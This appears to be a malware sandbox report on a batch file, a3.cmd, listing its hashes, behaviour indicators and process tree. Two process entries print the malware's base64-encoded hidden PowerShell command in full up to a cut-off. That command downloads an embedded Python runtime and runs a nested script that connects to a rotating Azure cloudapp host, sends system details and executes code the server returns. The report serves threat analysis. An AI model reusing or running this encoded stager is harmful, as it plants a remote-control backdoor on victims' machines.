File name:

a3.cmd

Full analysis: https://app.any.run/tasks/a6861f6a-5d26-43c4-aa79-69a99bd6dcac
Verdict: Malicious activity
Analysis date: March 12, 2024, 23:24:05
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/x-msdos-batch
File info: DOS batch file, ASCII text, with very long lines (8694), with CRLF line terminators
MD5:

5B996A93321AD5540450F1DD73802E5F

SHA1:

9C36B084BB482ABBDA35DF60D50BBED7453D6AD6

SHA256:

010D9F1F16C01DB5FF37FF9B519D7ECF3BE096E00AE597D7BEC12B7099B2F852

SSDEEP:

192:GN9gvQfTr5OiHEPoU0HJTfptyO2CyClOHSU+:GN9gvQwMAoU0pTfrjeSU+

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 3720)
      • powershell.exe (PID: 748)

  • SUSPICIOUS

    • Executing commands from ".cmd" file

      • cmd.exe (PID: 4052)

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 4052)

    • Application launched itself

      • powershell.exe (PID: 3392)
      • cmd.exe (PID: 4052)

    • Base64-obfuscated command line is found

      • cmd.exe (PID: 3916)
      • powershell.exe (PID: 3392)

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 3916)
      • powershell.exe (PID: 3392)

    • BASE64 encoded PowerShell command has been detected

      • cmd.exe (PID: 3916)
      • powershell.exe (PID: 3392)

  • INFO

    • Manual execution by a user

      • notepad.exe (PID: 2580)
      • powershell.exe (PID: 3392)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
45
Monitored processes
6
Malicious processes
0
Suspicious processes
2

Behavior graph

Click at the process to see the details
start cmd.exe no specs cmd.exe no specs powershell.exe no specs notepad.exe no specs powershell.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
748"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -e CgAjACAANgAxADcANAAxADMANwAxADYANAAxADUAOQA0AAoAYwBkACAAJABFAE4AVgA6AHAAdQBiAGwAaQBjAAoAJABGAG8AbABkAGUAcgAyACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAeQB0AGgAbwBuACIACgBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQARgBvAGwAZABlAHIAMgAgAC0AUABhAHQAaABUAHkAcABlACAAQwBvAG4AdABhAGkAbgBlAHIAKQApACAAewAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAHcALgBlAHgAZQAgAC0AYwAgACIAIgAiAGkAbQBwAG8AcgB0ACAAYgBhAHMAZQA2ADQAOwAgAGUAeABlAGMAKABiAGEAcwBlADYANAAuAGIANgA0AGQAZQBjAG8AZABlACgAJwAnACcAJwAnACcAJwAnACcASQB5AEEAbABVAGsARgBPAFIARQA5AE4AUwBWAHAAQgBSAEUAOABsAEMAaQBNAGcASgBWAEoAQgBUAGsAUgBQAFQAVQBsAGEAUQBVAFIAUABNAGkAVQBLAEkAeQBBAGwAVQBrAEYATwBSAEUAOQBOAFMAVgBwAEIAUgBFADgAegBKAFEAcAAzAGEARwBsAHMAWgBTAEIAVQBjAG4AVgBsAE8AZwBvAGcASQBDAEEAZwBkAEgASgA1AE8AZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkARwBaAHkAYgAyADAAZwBkAEcAbAB0AFoAUwBCAHAAYgBYAEIAdgBjAG4AUQBnAGMAMgB4AGwAWgBYAEEASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAagBjADIAeABsAFoAWABBAG8ATQB6AEEAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBhAFcAMQB3AGIAMwBKADAASQBIAE4AdgBZADIAdABsAGQAQwBCAGgAYwB5AEIAegBjAHcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcAWgB5AGIAMgAwAGcAYwBtAEYAdQBaAEcAOQB0AEkARwBsAHQAYwBHADkAeQBkAEMAQgBqAGEARwA5AHAAWQAyAFUASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAcABiAFgAQgB2AGMAbgBRAGcAZAAyAGwAdQBjAG0AVgBuAEkARwBGAHoASQBIAGMASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAcABiAFgAQgB2AGMAbgBRAGcAYwBHAGwAagBhADIAeABsAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAFoAbgBKAHYAYgBTAEIAawBZAFgAUgBsAGQARwBsAHQAWgBTAEIAcABiAFgAQgB2AGMAbgBRAGcAWgBHAEYAMABaAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcAUgBsAFoAaQBCAHcAZABDAGcAcABPAGcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCADAAYwBuAGsANgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAawBJAEQAMABnAFoARwBGADAAWgBTADUAMABiADIAUgBoAGUAUwBnAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCADUASQBEADAAZwBXADEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEcAWgB2AGMAaQBCADQASQBHAGwAdQBJAEgASgBoAGIAbQBkAGwASwBEAEUAcwBJAEQASQB4AEwAQwBBAHkASwBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgA1AEwAbQBGAHcAYwBHAFYAdQBaAEMAaABwAGIAbgBRAG8AYwAzAFIAeQBLAEcAbAB1AGQAQwBoAHAAYgBuAFEAbwBaAGkAZAA3AFoAQwA1AGsAWQBYAGwAOQBlADIAUQB1AGIAVwA5AHUAZABHAGgAOQBlADIAUQB1AGUAVwBWAGgAYwBuADAAbgBLAFMAQQBxAEkASABnAHAASwBWAHMANgBOAEYAMABwAEsAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMAbQBWADAAZABYAEoAdQBJAEgAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAWgBYAGgAagBaAFgAQgAwAE8AZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMAbQBWADAAZABYAEoAdQBJAEYAcwAwAE4ARABOAGQAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcAWgBHAFYAbQBJAEcAeAByAEsAQwBrADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEcAbAB0AGMARwA5AHkAZABDAEIAbwBZAFgATgBvAGIARwBsAGkAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAUgB5AGUAVABvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBRAGcAUABTAEIAawBZAFgAUgBsAEwAbgBSAHYAWgBHAEYANQBLAEMAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAZABwAEkARAAwAGcAWgBDADUAMwBaAFcAVgByAFoARwBGADUASwBDAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAFIAcABJAEQAMABnAFoAQwA1AGsAWQBYAGsAZwBLAHkAQgAzAGEAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGIAQwBBADkASQBDAGQAaABZAG0ATgBrAFoAVwBaAG4AYQBHAGwAcQBiAEcAMQB1AGIAMwBCAHgAYwBuAE4AMABkAFgAWgA0AGUAbgBkAHIAZQBXAHAAcwBiAFcANQB2AGMASABGAGgAWQBtAE4AbgBhAEcAcABzAEoAMQB0AGsAYQBWADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAEkAZwBQAFMAQgBiAFgAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAFoAbQA5AHkASQBGADgAZwBhAFcANABnAGMAbQBGAHUAWgAyAFUAbwBOAFMAawA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAZABDAEEAOQBJAEcAaABoAGMAMgBoAHMAYQBXAEkAdQBjADIAaABoAE0AUwBoAG0ASQBuAHQAawBhAFMAcAAzAGEAUwBwAGYAZgBYAHQAcwBmAFgAdAAzAGEAWAAxADcAYgBIADEANwBaAEMANQB0AGIAMgA1ADAAYQBDAEEAcQBJAEcAUgBwAEsAbAA5ADkAZQAyAHgAOQBlADIAUQB1AGUAVwBWAGgAYwBpAHAAawBhAFMAcABmAGYAUwBJAHUAWgBXADUAagBiADIAUgBsAEsAQwBrAHAATABtAGgAbABlAEcAUgBwAFoAMgBWAHoAZABDAGcAcABLAGoARQB3AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYwBpADUAaABjAEgAQgBsAGIAbQBRAG8AZABGAHMANgBOAEQAVQB0AFgAMQAwAHUAYwBtAFYAdwBiAEcARgBqAFoAUwBoADAAVwB6AHAAawBhAFYAMABzAEkARwB3AHAATABtAHgAdgBkADIAVgB5AEsAQwBrAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGMAZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAbABlAEcATgBsAGMASABRADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAFcAMgBZAG4AWgAyADkAdgBaADIAeABsAGUAMgBSAHAAZgBTAGQAZABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBaAEcAVgBtAEkASABBAG8AWQB5AHcAZwBiAGkAawA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAE0AeQBJAEQAMABnAGQAeQA1AFAAYwBHAFYAdQBTADIAVgA1AEsASABjAHUAUwBFAHQARgBXAFYAOQBNAFQAMABOAEIAVABGADkATgBRAFUATgBJAFMAVQA1AEYATABDAEIAagBLAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGQAeQA1AFIAZABXAFYAeQBlAFYAWgBoAGIASABWAGwAUgBYAGcAbwBjAHoASQBzAEkARwA0AHAAVwB6AEIAZABDAGcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEgAQgB5AEkARAAwAGcAYwBDAGgAeQBKADAAaABCAFUAawBSAFgAUQBWAEoARgBYAEYAeABFAFIAVgBOAEQAVQBrAGwAUQBWAEUAbABQAFQAbAB4AGMAVQAzAGwAegBkAEcAVgB0AFgARgB4AEQAWgBXADUAMABjAG0ARgBzAFUASABKAHYAWQAyAFYAegBjADIAOQB5AFgARgB3AHcASgB5AHcAZwBKADEAQgB5AGIAMgBOAGwAYwAzAE4AdgBjAGsANQBoAGIAVwBWAFQAZABIAEoAcABiAG0AYwBuAEsAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkASABaAHoASQBEADAAZwBjAEMAaAB5AEoAMQBOAFAAUgBsAFIAWABRAFYASgBGAFgARgB4AE4AYQBXAE4AeQBiADMATgB2AFoAbgBSAGMAWABGAGQAcABiAG0AUgB2AGQAMwBNAGcAVABsAFIAYwBYAEUATgAxAGMAbgBKAGwAYgBuAFIAVwBaAFgASgB6AGEAVwA5AHUASgB5AHcAZwBKADEAQgB5AGIAMgBSADEAWQAzAFIATwBZAFcAMQBsAEoAeQBrAEsAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcAYQBXAFkAZwBKADAASgB5AGIAMgBGAGsAZAAyAFYAcwBiAEMAYwBnAGEAVwA0AGcAYwBIAEkANgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBKAHkAWgBXAEYAcgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBkADIAbAAwAGEAQwBCAHoAYwB5ADUAegBiADIATgByAFoAWABRAG8AYwAzAE0AdQBRAFUAWgBmAFMAVQA1AEYAVgBDAHcAZwBjADMATQB1AFUAMAA5AEQAUwAxADkAVABWAEYASgBGAFEAVQAwAHAASQBHAEYAegBJAEgATQA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAE0AdQBjADIAVgAwAGQARwBsAHQAWgBXADkAMQBkAEMAZwB6AE0AQwBrAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBjAHkANQBqAGIAMgA1AHUAWgBXAE4AMABLAEMAaABtAEoAMwB0AGoAYQBHADkAcABZADIAVQBvAGIARwBzAG8ASwBWAHMAMABPAGwAMABwAGYAUwA1AGkAYwBtAEYANgBhAFcAeAB6AGIAMwBWADAAYQBDADUAagBiAEcAOQAxAFoARwBGAHcAYwBDADUAaABlAG4AVgB5AFoAUwA1AGoAYgAyADAAbgBMAEMAQgBqAGEARwA5AHAAWQAyAFUAbwBjAEgAUQBvAEsAUwBrAHAASwBRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgB6AEwAbgBOAGwAYgBtAFEAbwBaAGkAZAB3AGUAVQBOAHYAWgBHAFYAVwBNAFMAQQB0AEkAQwBwAE8AUgBWAGMAcQBJAEgAdAB6AGMAeQA1AG4AWgBYAFIAbwBiADMATgAwAGIAbQBGAHQAWgBTAGcAcABmAFMAQgA4AEkASAB0ADIAYwAzADAAZwBmAEMAQgA3AGMASABKADkASgB5ADUAbABiAG0ATgB2AFoARwBVAG8ASwBTAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMAMgB4AGwAWgBYAEEAbwBNAGkAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYQBXADUAbQBiADEAOQBpAGEAVwA0AGcAUABTAEIAaQBKAHkAYwBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAZAAyAGgAcABiAEcAVQBnAFYASABKADEAWgBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAE0AZwBQAFMAQgB6AEwAbgBKAGwAWQAzAFkAbwBNAGoAQQAwAE8AQwBvAHgATQBEAEEAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAcABaAGkAQgB1AGIAMwBRAGcAWQB6AG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgBpAGMAbQBWAGgAYQB3AG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYQBXADUAbQBiADEAOQBpAGEAVwA0AGcASwB6ADAAZwBZAHcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHAAYgBtAFoAdgBJAEQAMABnAGMARwBsAGoAYQAyAHgAbABMAG0AeAB2AFkAVwBSAHoASwBHAGwAdQBaAG0AOQBmAFkAbQBsAHUASwBRAG8AZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgBsAGUARwBWAGoASwBHAGwAdQBaAG0AOQBiAEoAMABOAHYAWgBHAFYAUQBlAFMAZABkAEwAQwBCADcASgAyAFIAaABkAEcARgBTAFoAVwBNAG4ATwBpAEIAcABiAG0AWgB2AFcAeQBkAG0AYQBXAHgAbABKADEAMABzAEkAQwBkAHcAZQBXADEAdABKAHoAbwBnAGEAVwA1AG0AYgAxC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2580"C:\Windows\System32\NOTEPAD.EXE" C:\Users\admin\Downloads\a3.cmdC:\Windows\System32\notepad.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Notepad
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\notepad.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
3392"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3720powershell -WindowStyle Hidden -e CgAjACAANgAxADcANAAxADMANwAxADYANAAxADUAOQA0AAoAYwBkACAAJABFAE4AVgA6AHAAdQBiAGwAaQBjAAoAJABGAG8AbABkAGUAcgAyACAAPQAgACIAJAB7AEUATgBWADoAcAB1AGIAbABpAGMAfQBcAHAAeQB0AGgAbwBuACIACgBpAGYAIAAoACEAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQARgBvAGwAZABlAHIAMgAgAC0AUABhAHQAaABUAHkAcABlACAAQwBvAG4AdABhAGkAbgBlAHIAKQApACAAewAKACAAIAAgACAASQBuAHYAbwBrAGUALQBXAGUAYgBSAGUAcQB1AGUAcwB0ACAALQBVAFIASQAgAGgAdAB0AHAAcwA6AC8ALwB3AHcAdwAuAHAAeQB0AGgAbwBuAC4AbwByAGcALwBmAHQAcAAvAHAAeQB0AGgAbwBuAC8AMwAuADkALgA2AC8AcAB5AHQAaABvAG4ALQAzAC4AOQAuADYALQBlAG0AYgBlAGQALQB3AGkAbgAzADIALgB6AGkAcAAgAC0ATwB1AHQARgBpAGwAZQAgAHAAeQB0AGgAbwBuAC4AegBpAHAAOwAKACAAIAAgACAARQB4AHAAYQBuAGQALQBBAHIAYwBoAGkAdgBlACAAcAB5AHQAaABvAG4ALgB6AGkAcAAgAC0ARABlAHMAdABpAG4AYQB0AGkAbwBuAFAAYQB0AGgAIABwAHkAdABoAG8AbgA7AAoAfQAKAC4AXABwAHkAdABoAG8AbgBcAHAAeQB0AGgAbwBuAHcALgBlAHgAZQAgAC0AYwAgACIAIgAiAGkAbQBwAG8AcgB0ACAAYgBhAHMAZQA2ADQAOwAgAGUAeABlAGMAKABiAGEAcwBlADYANAAuAGIANgA0AGQAZQBjAG8AZABlACgAJwAnACcAJwAnACcAJwAnACcASQB5AEEAbABVAGsARgBPAFIARQA5AE4AUwBWAHAAQgBSAEUAOABsAEMAaQBNAGcASgBWAEoAQgBUAGsAUgBQAFQAVQBsAGEAUQBVAFIAUABNAGkAVQBLAEkAeQBBAGwAVQBrAEYATwBSAEUAOQBOAFMAVgBwAEIAUgBFADgAegBKAFEAcAAzAGEARwBsAHMAWgBTAEIAVQBjAG4AVgBsAE8AZwBvAGcASQBDAEEAZwBkAEgASgA1AE8AZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkARwBaAHkAYgAyADAAZwBkAEcAbAB0AFoAUwBCAHAAYgBYAEIAdgBjAG4AUQBnAGMAMgB4AGwAWgBYAEEASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAagBjADIAeABsAFoAWABBAG8ATQB6AEEAcABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBhAFcAMQB3AGIAMwBKADAASQBIAE4AdgBZADIAdABsAGQAQwBCAGgAYwB5AEIAegBjAHcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcAWgB5AGIAMgAwAGcAYwBtAEYAdQBaAEcAOQB0AEkARwBsAHQAYwBHADkAeQBkAEMAQgBqAGEARwA5AHAAWQAyAFUASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAcABiAFgAQgB2AGMAbgBRAGcAZAAyAGwAdQBjAG0AVgBuAEkARwBGAHoASQBIAGMASwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAcABiAFgAQgB2AGMAbgBRAGcAYwBHAGwAagBhADIAeABsAEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAFoAbgBKAHYAYgBTAEIAawBZAFgAUgBsAGQARwBsAHQAWgBTAEIAcABiAFgAQgB2AGMAbgBRAGcAWgBHAEYAMABaAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEcAUgBsAFoAaQBCAHcAZABDAGcAcABPAGcAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCADAAYwBuAGsANgBDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAawBJAEQAMABnAFoARwBGADAAWgBTADUAMABiADIAUgBoAGUAUwBnAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCADUASQBEADAAZwBXADEAMABLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEcAWgB2AGMAaQBCADQASQBHAGwAdQBJAEgASgBoAGIAbQBkAGwASwBEAEUAcwBJAEQASQB4AEwAQwBBAHkASwBUAG8ASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQgA1AEwAbQBGAHcAYwBHAFYAdQBaAEMAaABwAGIAbgBRAG8AYwAzAFIAeQBLAEcAbAB1AGQAQwBoAHAAYgBuAFEAbwBaAGkAZAA3AFoAQwA1AGsAWQBYAGwAOQBlADIAUQB1AGIAVwA5AHUAZABHAGgAOQBlADIAUQB1AGUAVwBWAGgAYwBuADAAbgBLAFMAQQBxAEkASABnAHAASwBWAHMANgBOAEYAMABwAEsAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMAbQBWADAAZABYAEoAdQBJAEgAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAWgBYAGgAagBaAFgAQgAwAE8AZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGMAbQBWADAAZABYAEoAdQBJAEYAcwAwAE4ARABOAGQAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcAWgBHAFYAbQBJAEcAeAByAEsAQwBrADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEcAbAB0AGMARwA5AHkAZABDAEIAbwBZAFgATgBvAGIARwBsAGkAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAUgB5AGUAVABvAEsASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkARwBRAGcAUABTAEIAawBZAFgAUgBsAEwAbgBSAHYAWgBHAEYANQBLAEMAawBLAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEgAZABwAEkARAAwAGcAWgBDADUAMwBaAFcAVgByAFoARwBGADUASwBDAGsASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBHAFIAcABJAEQAMABnAFoAQwA1AGsAWQBYAGsAZwBLAHkAQgAzAGEAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAGIAQwBBADkASQBDAGQAaABZAG0ATgBrAFoAVwBaAG4AYQBHAGwAcQBiAEcAMQB1AGIAMwBCAHgAYwBuAE4AMABkAFgAWgA0AGUAbgBkAHIAZQBXAHAAcwBiAFcANQB2AGMASABGAGgAWQBtAE4AbgBhAEcAcABzAEoAMQB0AGsAYQBWADAASwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAEkAZwBQAFMAQgBiAFgAUQBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAFoAbQA5AHkASQBGADgAZwBhAFcANABnAGMAbQBGAHUAWgAyAFUAbwBOAFMAawA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAZABDAEEAOQBJAEcAaABoAGMAMgBoAHMAYQBXAEkAdQBjADIAaABoAE0AUwBoAG0ASQBuAHQAawBhAFMAcAAzAGEAUwBwAGYAZgBYAHQAcwBmAFgAdAAzAGEAWAAxADcAYgBIADEANwBaAEMANQB0AGIAMgA1ADAAYQBDAEEAcQBJAEcAUgBwAEsAbAA5ADkAZQAyAHgAOQBlADIAUQB1AGUAVwBWAGgAYwBpAHAAawBhAFMAcABmAGYAUwBJAHUAWgBXADUAagBiADIAUgBsAEsAQwBrAHAATABtAGgAbABlAEcAUgBwAFoAMgBWAHoAZABDAGcAcABLAGoARQB3AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcAYwBpADUAaABjAEgAQgBsAGIAbQBRAG8AZABGAHMANgBOAEQAVQB0AFgAMQAwAHUAYwBtAFYAdwBiAEcARgBqAFoAUwBoADAAVwB6AHAAawBhAFYAMABzAEkARwB3AHAATABtAHgAdgBkADIAVgB5AEsAQwBrAHAAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGMAZwBvAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEIAbABlAEcATgBsAGMASABRADYAQwBpAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAFcAMgBZAG4AWgAyADkAdgBaADIAeABsAGUAMgBSAHAAZgBTAGQAZABDAGkAQQBnAEkAQwBBAGcASQBDAEEAZwBaAEcAVgBtAEkASABBAG8AWQB5AHcAZwBiAGkAawA2AEMAaQBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBBAGcASQBIAE0AeQBJAEQAMABnAGQAeQA1AFAAYwBHAFYAdQBTADIAVgA1AEsASABjAHUAUwBFAHQARgBXAFYAOQBNAFQAMABOAEIAVABGADkATgBRAFUATgBJAFMAVQA1AEYATABDAEIAagBLAFEAbwBnAEkAQwBBAGcASQBDAEEAZwBJAEMAQQBnAEkAQwBCAHkAWgBYAFIAMQBjAG0ANABnAGQAeQA1AFIAZABXAFYAeQBlAFYAWgBoAGIASABWAGwAUgBYAGcAbwBjAHoASQBzAEkARwA0AHAAVwB